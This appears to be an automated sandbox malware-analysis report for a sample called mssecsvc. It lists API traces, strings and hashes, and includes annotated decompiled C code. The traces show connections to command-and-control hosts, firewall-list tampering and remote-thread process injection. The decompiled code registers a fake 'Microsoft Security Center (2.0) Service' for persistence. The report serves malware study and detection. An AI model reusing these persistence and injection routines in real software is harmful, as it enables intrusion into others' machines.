                                                                                                                                                • String ID: ADVAPI32.DLL$C:,$C:\Program Files (x86)\QxmjpcazkXhrxEMyZMHZXXEYGdZKTLIuGGuluQecNfOrZXEwSk\mcelwciKpeNAdrHBUbBbQgwqJRdg.exe$C:\WINDOWS\TASKSCHE.EXE$SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List
                                                                                                                                                • API String ID: 3734769084-3999816838
                                                                                                                                                • Opcode ID: fe378de023044d5e93c1fdb9f401057012e9a432939cf19daad1b95bd79d3ac1
                                                                                                                                                • Instruction ID: a2a5be16d0f9009bfdc587255d2e4c0d6226cab3545a9c618f876dcd14acdd72
                                                                                                                                                • Opcode Fuzzy Hash: fe378de023044d5e93c1fdb9f401057012e9a432939cf19daad1b95bd79d3ac1
                                                                                                                                                • Instruction Fuzzy Hash: 5ED1EF72508248BFEF35AF248C5AFEA7BACEF45300F06451DE84A9E082D6F45F4587A5
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • GetProcAddress.KERNEL32(00000000,7FEA3D41), ref: 7FEA3D4C
                                                                                                                                                • LoadLibraryA.KERNEL32(ADVAPI32.DLL), ref: 7FEA3D5F
                                                                                                                                                • GetTickCount.KERNEL32 ref: 7FEA3D93
                                                                                                                                                • GetVolumeInformationA.KERNEL32(00000000,00000000,00000000,7FEA6EF6,00000000,00000000,00000000,00000000), ref: 7FEA3E65
                                                                                                                                                • GetModuleFileNameA.KERNEL32(00000000,C:\Program Files (x86)\QxmjpcazkXhrxEMyZMHZXXEYGdZKTLIuGGuluQecNfOrZXEwSk\mcelwciKpeNAdrHBUbBbQgwqJRdg.exe,000000C8), ref: 7FEA3EE2
                                                                                                                                                • wsprintfA.USER32 ref: 7FEA3EF7
                                                                                                                                                • CreateThread.KERNEL32(00000000,00000000,7FEA3691,00000000,00000000), ref: 7FEA3F40
                                                                                                                                                • CloseHandle.KERNEL32(?,E81213EA), ref: 7FEA3F49
                                                                                                                                                • CreateThread.KERNEL32(00000000,00000000,Function_00003888,00000000,00000000), ref: 7FEA3FE9
                                                                                                                                                • CloseHandle.KERNEL32(?,00000000), ref: 7FEA3FF2
                                                                                                                                                • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00000000), ref: 7FEA3FFF
                                                                                                                                                • socket.WS2_32(00000002,00000001,00000000), ref: 7FEA4097
                                                                                                                                                • connect.WS2_32(6F6C6902,7FEA3B09,00000010), ref: 7FEA40B1
                                                                                                                                                • GetVersionExA.KERNEL32(?,?,00000000), ref: 7FEA40FB
                                                                                                                                                • wsprintfA.USER32 ref: 7FEA4179
                                                                                                                                                • SetEvent.KERNEL32(000002A0,?,00000000), ref: 7FEA42D6
                                                                                                                                                • Sleep.KERNEL32(00007530,?,00000000), ref: 7FEA42F7
                                                                                                                                                • ResetEvent.KERNEL32(000002A0,?,00000000), ref: 7FEA430A
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.505701930.000000007FEA0000.00000040.10000000.00040000.00000000.sdmp, Offset: 7FEA0000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_7fea0000_mssecsvc.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: CreateEvent$CloseHandleThreadwsprintf$AddressCountFileInformationLibraryLoadModuleNameProcResetSleepTickVersionVolumeconnectsocket
                                                                                                                                                • String ID: ADVAPI32.DLL$C:,$C:\Program Files (x86)\QxmjpcazkXhrxEMyZMHZXXEYGdZKTLIuGGuluQecNfOrZXEwSk\mcelwciKpeNAdrHBUbBbQgwqJRdg.exe$SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List$\DEVICE\AFD\ENDPOINT
                                                                                                                                                • API String ID: 1567941233-2923680188
                                                                                                                                                • Opcode ID: d164329b401e47e84a28de3fe606969c9cc020fa4a70ab4836cae6f21abb50e9
                                                                                                                                                • Instruction ID: 0fd1af5c82e6ac19fee7a4e27b5b7e3d4aaa516ddc9e53bac77035a7f4224d32
                                                                                                                                                • Opcode Fuzzy Hash: d164329b401e47e84a28de3fe606969c9cc020fa4a70ab4836cae6f21abb50e9
                                                                                                                                                • Instruction Fuzzy Hash: BBE1EF71419348BFEB229F748C4ABFA7BACEF41304F00465AEC4A9E081D6F66F059761
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • GetProcAddress.KERNEL32(00000000,00AC3D41), ref: 00AC3D4C
                                                                                                                                                • LoadLibraryA.KERNEL32(ADVAPI32.DLL), ref: 00AC3D5F
                                                                                                                                                • GetTickCount.KERNEL32 ref: 00AC3D93
                                                                                                                                                • GetVolumeInformationA.KERNEL32(00000000,00000000,00000000,00AC6EF6,00000000,00000000,00000000,00000000), ref: 00AC3E65
                                                                                                                                                • GetModuleFileNameA.KERNEL32(00000000,C:\Program Files (x86)\QxmjpcazkXhrxEMyZMHZXXEYGdZKTLIuGGuluQecNfOrZXEwSk\mcelwciKpeNAdrHBUbBbQgwqJRdg.exe,000000C8), ref: 00AC3EE2
                                                                                                                                                • wsprintfA.USER32 ref: 00AC3EF7
                                                                                                                                                • CreateThread.KERNEL32(00000000,00000000,00AC3691,00000000,00000000), ref: 00AC3F40
                                                                                                                                                • CloseHandle.KERNEL32(?,E81213EA), ref: 00AC3F49
                                                                                                                                                • CreateThread.KERNEL32(00000000,00000000,Function_00003888,00000000,00000000), ref: 00AC3FE9
                                                                                                                                                • CloseHandle.KERNEL32(?,00000000), ref: 00AC3FF2
                                                                                                                                                • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00000000), ref: 00AC3FFF
                                                                                                                                                • socket.WS2_32(00000002,00000001,00000000), ref: 00AC4097
                                                                                                                                                • connect.WS2_32(6F6C6902,00AC3B09,00000010), ref: 00AC40B1
                                                                                                                                                • GetVersionExA.KERNEL32(?,?,00000000), ref: 00AC40FB
                                                                                                                                                • wsprintfA.USER32 ref: 00AC4179
                                                                                                                                                • SetEvent.KERNEL32(000002A0,?,00000000), ref: 00AC42D6
                                                                                                                                                • Sleep.KERNEL32(00007530,?,00000000), ref: 00AC42F7
                                                                                                                                                • ResetEvent.KERNEL32(000002A0,?,00000000), ref: 00AC430A
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.502417271.0000000000AC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 00AC0000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_ac0000_mssecsvc.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: CreateEvent$CloseHandleThreadwsprintf$AddressCountFileInformationLibraryLoadModuleNameProcResetSleepTickVersionVolumeconnectsocket
                                                                                                                                                • String ID: ADVAPI32.DLL$C:,$C:\Program Files (x86)\QxmjpcazkXhrxEMyZMHZXXEYGdZKTLIuGGuluQecNfOrZXEwSk\mcelwciKpeNAdrHBUbBbQgwqJRdg.exe$C:\WINDOWS\TASKSCHE.EXE$SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List
                                                                                                                                                • API String ID: 1567941233-3999816838
                                                                                                                                                • Opcode ID: d164329b401e47e84a28de3fe606969c9cc020fa4a70ab4836cae6f21abb50e9
                                                                                                                                                • Instruction ID: 5c182fb308665e4bb8b3c2b648f8f88135ea83022802bae36458e07fd6d52dfc
                                                                                                                                                • Opcode Fuzzy Hash: d164329b401e47e84a28de3fe606969c9cc020fa4a70ab4836cae6f21abb50e9
                                                                                                                                                • Instruction Fuzzy Hash: 8EE1FF72404248BEEF21AF248C5AFEA7BACEF45300F06455DEC499E082D6F45F45C7A5
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • GetModuleHandleA.KERNEL32(00000000), ref: 7FEA04BE
                                                                                                                                                • GetVersion.KERNEL32 ref: 7FEA0500
                                                                                                                                                • VirtualAlloc.KERNEL32(00000000,000077C4,08001000,00000040), ref: 7FEA0528
                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 7FEA05AD
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.505701930.000000007FEA0000.00000040.10000000.00040000.00000000.sdmp, Offset: 7FEA0000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_7fea0000_mssecsvc.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Handle$AllocCloseModuleVersionVirtual
                                                                                                                                                • String ID: \BaseNamedObjects\axytVt$\BaseNamedObjects\axytVt$csrs
                                                                                                                                                • API String ID: 3017432202-8628898
                                                                                                                                                • Opcode ID: 5e26fa20f83f5e6203321ab9e5c6cfdbb76e6a20a0cc65ba3ebce16670a95049
                                                                                                                                                • Instruction ID: 376c8b8ebe22387fcb6572217874645f2f634c1d8e6058b442ff8ca82ff501ab
                                                                                                                                                • Opcode Fuzzy Hash: 5e26fa20f83f5e6203321ab9e5c6cfdbb76e6a20a0cc65ba3ebce16670a95049
                                                                                                                                                • Instruction Fuzzy Hash: 37B19E71506349FFEB229F24C849BFA3BA9FF45715F000128EA0A9E181C7F29B45CB59
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 7FEA05AD
                                                                                                                                                • GetModuleHandleA.KERNEL32(7FEA05EC), ref: 7FEA05F2
                                                                                                                                                • lstrcpyW.KERNEL32(\BaseNamedObjects\axytVt,\BaseNamedObjects\axytVt), ref: 7FEA070A
                                                                                                                                                • lstrcpyW.KERNEL32(\BaseNamedObjects\axytVt,?), ref: 7FEA072D
                                                                                                                                                • lstrcatW.KERNEL32(\BaseNamedObjects\axytVt,\axytVt), ref: 7FEA073B
                                                                                                                                                • NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,000077C4,00000000,?,00000002,00000000,00000040), ref: 7FEA076B
                                                                                                                                                • NtOpenProcessToken.NTDLL(000000FF,00000020), ref: 7FEA0786
                                                                                                                                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 7FEA07C9
                                                                                                                                                • Process32First.KERNEL32 ref: 7FEA07DC
                                                                                                                                                • Process32Next.KERNEL32 ref: 7FEA07ED
                                                                                                                                                • OpenProcess.KERNEL32(0000002A,00000000,?,?,?,?,?,?,00000002,00000000,00000040,00000000,000077C4), ref: 7FEA0805
                                                                                                                                                • CreateRemoteThread.KERNEL32(?,00000000,00000000,-00003C38,00000002,00000000), ref: 7FEA0842
                                                                                                                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,00000002,00000000,00000040,00000000,000077C4), ref: 7FEA085D
                                                                                                                                                • CloseHandle.KERNEL32 ref: 7FEA086C
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.505701930.000000007FEA0000.00000040.10000000.00040000.00000000.sdmp, Offset: 7FEA0000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_7fea0000_mssecsvc.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Handle$Close$CreateOpenProcessProcess32lstrcpy$FirstModuleNextRemoteSectionSnapshotThreadTokenToolhelp32Viewlstrcat
                                                                                                                                                • String ID: \BaseNamedObjects\axytVt$\BaseNamedObjects\axytVt$csrs
                                                                                                                                                • API String ID: 1545766225-8628898
                                                                                                                                                • Opcode ID: 587852de3d39a4d695cdbfc1c95892cdb4d54edcd7c040a1b51e64314113049a
                                                                                                                                                • Instruction ID: 2b4be82ea446db3c5a55f458cbae40a8dee7889a1131c82c6500b60ec9c55621
                                                                                                                                                • Opcode Fuzzy Hash: 587852de3d39a4d695cdbfc1c95892cdb4d54edcd7c040a1b51e64314113049a
                                                                                                                                                • Instruction Fuzzy Hash: 47716D31505205FFEB219F20CC49BBE3BBEEF85715F100068EA0A9E090C7B69F459B59
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • lstrlen.KERNEL32(ilo.brenz.pl,?,00000000), ref: 7FEA4057
                                                                                                                                                • gethostbyname.WS2_32(ilo.brenz.pl), ref: 7FEA4066
                                                                                                                                                • socket.WS2_32(00000002,00000001,00000000), ref: 7FEA4097
                                                                                                                                                • connect.WS2_32(6F6C6902,7FEA3B09,00000010), ref: 7FEA40B1
                                                                                                                                                • GetVersionExA.KERNEL32(?,?,00000000), ref: 7FEA40FB
                                                                                                                                                • wsprintfA.USER32 ref: 7FEA4179
• CreateThread.KERNEL32(00000000,00000000,Function_00003819,6F6C6902,00000000), ref: 7FEA41B4
• CloseHandle.KERNEL32(?,00000000,6F6C6902,7FEA6AA2,00000000,00000000), ref: 7FEA41BD
• GetTickCount.KERNEL32 ref: 7FEA41F6
• Sleep.KERNEL32(00000064,?,00000000,6F6C6902,7FEA6AA2,00000000,00000000), ref: 7FEA428B
• GetTickCount.KERNEL32 ref: 7FEA4294
• closesocket.WS2_32(6F6C6902), ref: 7FEA42B8
• SetEvent.KERNEL32(000002A0,?,00000000), ref: 7FEA42D6
• Sleep.KERNEL32(00007530,?,00000000), ref: 7FEA42F7
• ResetEvent.KERNEL32(000002A0,?,00000000), ref: 7FEA430A
Strings
• C:\Program Files (x86)\QxmjpcazkXhrxEMyZMHZXXEYGdZKTLIuGGuluQecNfOrZXEwSk\mcelwciKpeNAdrHBUbBbQgwqJRdg.exe, xrefs: 7FEA4178, 7FEA4195, 7FEA41DB
• \DEVICE\AFD\ENDPOINT, xrefs: 7FEA41DA
Memory Dump Source
• Source File: 00000004.00000002.505701930.000000007FEA0000.00000040.10000000.00040000.00000000.sdmp, Offset: 7FEA0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7fea0000_mssecsvc.jbxd
Yara matches
Similarity
• API ID: CountEventSleepTick$CloseCreateHandleResetThreadVersionclosesocketconnectgethostbynamelstrlensocketwsprintf
• String ID: C:\Program Files (x86)\QxmjpcazkXhrxEMyZMHZXXEYGdZKTLIuGGuluQecNfOrZXEwSk\mcelwciKpeNAdrHBUbBbQgwqJRdg.exe$\DEVICE\AFD\ENDPOINT
• API String ID: 883794535-1462811877
• Opcode ID: 6b0defe1960dce2cb68afb5d2726ae1425874940fd6c70606eed0c1c35355a33
• Instruction ID: 62042b7e1d70db51705c832b3ce7fc9885254b828fc8a61664828cce23236026
• Opcode Fuzzy Hash: 6b0defe1960dce2cb68afb5d2726ae1425874940fd6c70606eed0c1c35355a33
• Instruction Fuzzy Hash: AD71EF75508348BAEB229F3488587EEBFAEEF81314F000608E85A9E1D1C7F66F45D761
Uniqueness
Uniqueness Score: -1.00%

APIs
• lstrlen.KERNEL32(ilo.brenz.pl,?,00000000), ref: 00AC4057
• gethostbyname.WS2_32(ilo.brenz.pl), ref: 00AC4066
• socket.WS2_32(00000002,00000001,00000000), ref: 00AC4097
• connect.WS2_32(6F6C6902,00AC3B09,00000010), ref: 00AC40B1
• GetVersionExA.KERNEL32(?,?,00000000), ref: 00AC40FB
• wsprintfA.USER32 ref: 00AC4179
• CreateThread.KERNEL32(00000000,00000000,Function_00003819,6F6C6902,00000000), ref: 00AC41B4
• CloseHandle.KERNEL32(?,00000000,6F6C6902,00AC6AA2,00000000,00000000), ref: 00AC41BD
• GetTickCount.KERNEL32 ref: 00AC41F6
• Sleep.KERNEL32(00000064,?,00000000,6F6C6902,00AC6AA2,00000000,00000000), ref: 00AC428B
• GetTickCount.KERNEL32 ref: 00AC4294
• closesocket.WS2_32(6F6C6902), ref: 00AC42B8
• SetEvent.KERNEL32(000002A0,?,00000000), ref: 00AC42D6
• Sleep.KERNEL32(00007530,?,00000000), ref: 00AC42F7
• ResetEvent.KERNEL32(000002A0,?,00000000), ref: 00AC430A
Strings
• C:\Program Files (x86)\QxmjpcazkXhrxEMyZMHZXXEYGdZKTLIuGGuluQecNfOrZXEwSk\mcelwciKpeNAdrHBUbBbQgwqJRdg.exe, xrefs: 00AC4178, 00AC4195, 00AC41DB
• C:\WINDOWS\TASKSCHE.EXE, xrefs: 00AC41DA
Memory Dump Source
• Source File: 00000004.00000002.502417271.0000000000AC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 00AC0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_ac0000_mssecsvc.jbxd
Yara matches
Similarity
• API ID: CountEventSleepTick$CloseCreateHandleResetThreadVersionclosesocketconnectgethostbynamelstrlensocketwsprintf
• String ID: C:\Program Files (x86)\QxmjpcazkXhrxEMyZMHZXXEYGdZKTLIuGGuluQecNfOrZXEwSk\mcelwciKpeNAdrHBUbBbQgwqJRdg.exe$C:\WINDOWS\TASKSCHE.EXE
• API String ID: 883794535-1685824476
• Opcode ID: 6b0defe1960dce2cb68afb5d2726ae1425874940fd6c70606eed0c1c35355a33
• Instruction ID: 61cbf47c03161470b9a8152189a942457e4fdba8ef220ec88e57bee4b30ae545
• Opcode Fuzzy Hash: 6b0defe1960dce2cb68afb5d2726ae1425874940fd6c70606eed0c1c35355a33
• Instruction Fuzzy Hash: 5871DE71504298BAEF319F28882EBDE7FADAF49310F15060CE89A9E181C7F45F41C769
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetSystemTime.KERNEL32(00AC7584), ref: 00AC389F
• Sleep.KERNEL32(0000EA60), ref: 00AC3911
• InternetGetConnectedState.WININET(?,00000000), ref: 00AC392A
• gethostbyname.WS2_32(0D278125), ref: 00AC396C
• socket.WS2_32(00000002,00000001,00000000), ref: 00AC3981
• ioctlsocket.WS2_32(?,8004667E), ref: 00AC399A
• connect.WS2_32(?,?,00000010), ref: 00AC39B3
• Sleep.KERNEL32(?,00000010,BB010002,00000000,8004667E,?,00000001), ref: 00AC39C1
• closesocket.WS2_32 ref: 00AC3A20
Strings
Memory Dump Source
• Source File: 00000004.00000002.502417271.0000000000AC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 00AC0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_ac0000_mssecsvc.jbxd
Yara matches
Similarity
• API ID: Sleep$ConnectedInternetStateSystemTimeclosesocketconnectgethostbynameioctlsocketsocket
• String ID: eeauou.com
• API String ID: 159131500-1932208585
• Opcode ID: b9cbcd502034ca6391bc477693aeae1c9470f5e239758c46d06d44a479c792e4
• Instruction ID: 9d05e3045229420a453d3691130959bc2551b68939f3fa7e8d5028c798b6e9fc
• Opcode Fuzzy Hash: b9cbcd502034ca6391bc477693aeae1c9470f5e239758c46d06d44a479c792e4
• Instruction Fuzzy Hash: 0B41B032644249BAEF319F248C4AFA97BAEAF85710F05802DF949EE1C1D7F59F408760
Uniqueness
Uniqueness Score: -1.00%

C-Code - Quality: 100%
E00407C40() {
    char _v260;
    void* _t15;
    void* _t17;

    /* Build the service command line "<module path> -m security".
       0x70f760 is the buffer that GetModuleFileNameA fills in E00408090. */
    sprintf( &_v260, "%s -m security", 0x70f760);
    /* 0xf003f = SC_MANAGER_ALL_ACCESS */
    _t15 = OpenSCManagerA(0, 0, 0xf003f);
    if(_t15 == 0) {
        return 0;
    } else {
        /* Register the sample as an auto-start own-process service named "mssecsvc2.0"
           (0xf01ff = SERVICE_ALL_ACCESS, 0x10 = SERVICE_WIN32_OWN_PROCESS,
           2 = SERVICE_AUTO_START, 1 = SERVICE_ERROR_NORMAL). */
        _t17 = CreateServiceA(_t15, "mssecsvc2.0", "Microsoft Security Center (2.0) Service", 0xf01ff, 0x10, 2, 1,  &_v260, 0, 0, 0, 0, 0);
        if(_t17 != 0) {
            /* Start the newly created service immediately. */
            StartServiceA(_t17, 0, 0);
            CloseServiceHandle(_t17);
        }
        CloseServiceHandle(_t15);
        return 0;
    }
}

APIs
• sprintf.MSVCRT ref: 00407C56
• OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F), ref: 00407C68
• CreateServiceA.ADVAPI32(00000000,mssecsvc2.0,Microsoft Security Center (2.0) Service,000F01FF,00000010,00000002,00000001,?,00000000,00000000,00000000,00000000,00000000,6F61FB10,00000000), ref: 00407C9B
• StartServiceA.ADVAPI32(00000000,00000000,00000000), ref: 00407CB2
• CloseServiceHandle.ADVAPI32(00000000), ref: 00407CB9
• CloseServiceHandle.ADVAPI32(00000000), ref: 00407CBC
Strings
Memory Dump Source
• Source File: 00000004.00000002.499030707.0000000000401000.00000080.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_mssecsvc.jbxd
Yara matches
Similarity
• API ID: Service$CloseHandle$CreateManagerOpenStartsprintf
• String ID: %s -m security$Microsoft Security Center (2.0) Service$mssecsvc2.0
• API String ID: 3340711343-4063779371
• Opcode ID: c3592d809756ac94f014d34e1e4fa0c14de5620095203194e3f9233ad68c92ee
• Instruction ID: 2288e5cc66680fabefb91112cf05624c6df81315eb9d87428618c258e2ee617f
• Opcode Fuzzy Hash: c3592d809756ac94f014d34e1e4fa0c14de5620095203194e3f9233ad68c92ee
• Instruction Fuzzy Hash: AD01D1717C43043BF2305B149D8BFEB3658AB84F01F500025FB44B92D0DAF9A81491AF
Uniqueness
Uniqueness Score: -1.00%

C-Code - Quality: 86%
E00408090() {
    char* _v4;
    char* _v8;
    intOrPtr _v12;
    struct _SERVICE_TABLE_ENTRY _v16;
    long _t6;
    void* _t19;
    void* _t22;

    /* Store the running module's own path at 0x70f760 (0x104 = MAX_PATH);
       E00407C40 later reuses this buffer for the service command line. */
    _t6 = GetModuleFileNameA(0, 0x70f760, 0x104);
    /* The decompiler reused _t6 for the int* returned by __p___argc(),
       so *_t6 below is argc. */
    __imp____p___argc();
    _t26 =  *_t6 - 2;
    if( *_t6 >= 2) {
        /* Started with arguments (e.g. "-m security"): running as the service.
           0xf003f = SC_MANAGER_ALL_ACCESS, 0xf01ff = SERVICE_ALL_ACCESS. */
        _t19 = OpenSCManagerA(0, 0, 0xf003f);
        __eflags = _t19;
        if(_t19 != 0) {
            _t22 = OpenServiceA(_t19, "mssecsvc2.0", 0xf01ff);
            __eflags = _t22;
            if(_t22 != 0) {
                E00407FA0(_t22, 0x3c);
                CloseServiceHandle(_t22);
            }
            CloseServiceHandle(_t19);
        }
        /* Hand control to the SCM with a one-entry service table:
           name "mssecsvc2.0", ServiceMain at 0x408000, NULL terminator. */
        _v16 = "mssecsvc2.0";
        _v12 = 0x408000;
        _v8 = 0;
        _v4 = 0;
        return StartServiceCtrlDispatcherA( &_v16);
    } else {
        /* Started without arguments: take the non-service path. */
        return E00407F20(_t26);
    }
}











APIs
• GetModuleFileNameA.KERNEL32(00000000,0070F760,00000104,?,004081B2), ref: 0040809F
• __p___argc.MSVCRT ref: 004080A5
• OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F,00000000,?,004081B2), ref: 004080C3
• OpenServiceA.ADVAPI32(00000000,mssecsvc2.0,000F01FF,6F61FB10,00000000,?,004081B2), ref: 004080DC
• CloseServiceHandle.ADVAPI32(00000000,?,?,?,004081B2), ref: 004080FA
• CloseServiceHandle.ADVAPI32(00000000,?,004081B2), ref: 004080FD
• StartServiceCtrlDispatcherA.ADVAPI32(?,?,?), ref: 00408126
Strings
Memory Dump Source
• Source File: 00000004.00000002.499030707.0000000000401000.00000080.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.499000927.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.499068443.0000000000409000.00000040.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.499102818.000000000040A000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.499128705.000000000040B000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.499145703.000000000040F000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.499190020.0000000000431000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.499291701.0000000000710000.00000080.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.501302167.0000000000A6B000.00000040.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_mssecsvc.jbxd
Yara matches
Similarity
• API ID: Service$CloseHandleOpen$CtrlDispatcherFileManagerModuleNameStart__p___argc
• String ID: mssecsvc2.0
• API String ID: 4274534310-3729025388
• Opcode ID: 14f2d0f9cf239aa653f070f930b60ae04978eb0b591616557438e437b3700a6a
• Instruction ID: 0eddf8d8cc97b5ba853ece0b0f9ce4fe0dc31dc3004373c78c05f92e851b2f94
• Opcode Fuzzy Hash: 14f2d0f9cf239aa653f070f930b60ae04978eb0b591616557438e437b3700a6a
• Instruction Fuzzy Hash: 4A014775640315BBE3117F149E4AF6F3AA4EF80B19F404429F544762D2DFB888188AAF
Uniqueness

Uniqueness Score: -1.00%

APIs
• NtOpenSection.NTDLL(?,00000006,?,00000018,?,?,00000040,?,?,63697379), ref: 7FEA344A
• NtQuerySystemInformation.NTDLL(0000000B,?,00000120,00000000), ref: 7FEA3469
• MapViewOfFile.KERNEL32(?,00000006,00000000,?,?,?,00000120,00000000), ref: 7FEA3493
• CloseHandle.KERNEL32(?,00000000,?,00000120,00000000), ref: 7FEA34A0
• UnmapViewOfFile.KERNEL32(?), ref: 7FEA34B8
Strings
Memory Dump Source
• Source File: 00000004.00000002.505701930.000000007FEA0000.00000040.10000000.00040000.00000000.sdmp, Offset: 7FEA0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7fea0000_mssecsvc.jbxd
Yara matches
Similarity
• API ID: FileView$CloseHandleInformationOpenQuerySectionSystemUnmap
• String ID: C:,$\Device\PhysicalMemory
• API String ID: 2985292042-1440550476
• Opcode ID: e2b0c8f568571b3f59211b8063e335b2ad8ba4e779b6cb58c9455f457ca39783
• Instruction ID: 89bc292a39abda77eba81180b1336a71123f95df307fbb064623dea506d6362f
• Opcode Fuzzy Hash: e2b0c8f568571b3f59211b8063e335b2ad8ba4e779b6cb58c9455f457ca39783
• Instruction Fuzzy Hash: 5A817671500208FFEB218F14CC89ABA7BADEF44704F504658ED1A9F295D7F2AF458BA4
Uniqueness

Uniqueness Score: -1.00%

APIs
• NtOpenSection.NTDLL(?,00000006,?,00000018,?,?,00000040,?,?,63697379), ref: 00AC344A
• NtQuerySystemInformation.NTDLL(0000000B,?,00000120,00000000), ref: 00AC3469
• MapViewOfFile.KERNEL32(?,00000006,00000000,?,?,?,00000120,00000000), ref: 00AC3493
• CloseHandle.KERNEL32(?,00000000,?,00000120,00000000), ref: 00AC34A0
• UnmapViewOfFile.KERNEL32(?), ref: 00AC34B8
Strings
Memory Dump Source
• Source File: 00000004.00000002.502417271.0000000000AC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 00AC0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_ac0000_mssecsvc.jbxd
Yara matches
Similarity
• API ID: FileView$CloseHandleInformationOpenQuerySectionSystemUnmap
• String ID: C:,$\Device\PhysicalMemory
• API String ID: 2985292042-1440550476
• Opcode ID: e2b0c8f568571b3f59211b8063e335b2ad8ba4e779b6cb58c9455f457ca39783
• Instruction ID: ab3470033767ba08252561c6da93687e3ae021c62f5515d8fcb40e39bd3fca3f
• Opcode Fuzzy Hash: e2b0c8f568571b3f59211b8063e335b2ad8ba4e779b6cb58c9455f457ca39783
• Instruction Fuzzy Hash: 41817871500208BFEB248F15CC89FAA3BBCEF44705F51861CED199B291D7F0AF458AA4
Uniqueness

Uniqueness Score: -1.00%

APIs
• NtOpenSection.NTDLL(?,00000006,?,00000018,?,?,00000040,?,?,63697379), ref: 7FEA344A
• NtQuerySystemInformation.NTDLL(0000000B,?,00000120,00000000), ref: 7FEA3469
• MapViewOfFile.KERNEL32(?,00000006,00000000,?,?,?,00000120,00000000), ref: 7FEA3493
• CloseHandle.KERNEL32(?,00000000,?,00000120,00000000), ref: 7FEA34A0
• UnmapViewOfFile.KERNEL32(?), ref: 7FEA34B8
Strings
Memory Dump Source
• Source File: 00000004.00000002.505701930.000000007FEA0000.00000040.10000000.00040000.00000000.sdmp, Offset: 7FEA0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7fea0000_mssecsvc.jbxd
Yara matches
Similarity
• API ID: FileView$CloseHandleInformationOpenQuerySectionSystemUnmap
• String ID: C:,$ysic
• API String ID: 2985292042-2852681185
• Opcode ID: 75692eae59ef229a2f56f45455e385a3c03fd5a3a941212ab90a82f7e6085517
• Instruction ID: 20dbb16ab5d0e33e58175ecc7424444a29ed84bf4ea1b595fcedbc50fe00d084
• Opcode Fuzzy Hash: 75692eae59ef229a2f56f45455e385a3c03fd5a3a941212ab90a82f7e6085517
• Instruction Fuzzy Hash: D5115B74140608BFEB21CF10CC55FAA7A7DEF88704F50451CEA1A9E290EBF56F188A68
Uniqueness

Uniqueness Score: -1.00%

APIs
• NtOpenSection.NTDLL(?,00000006,?,00000018,?,?,00000040,?,?,63697379), ref: 00AC344A
• NtQuerySystemInformation.NTDLL(0000000B,?,00000120,00000000), ref: 00AC3469
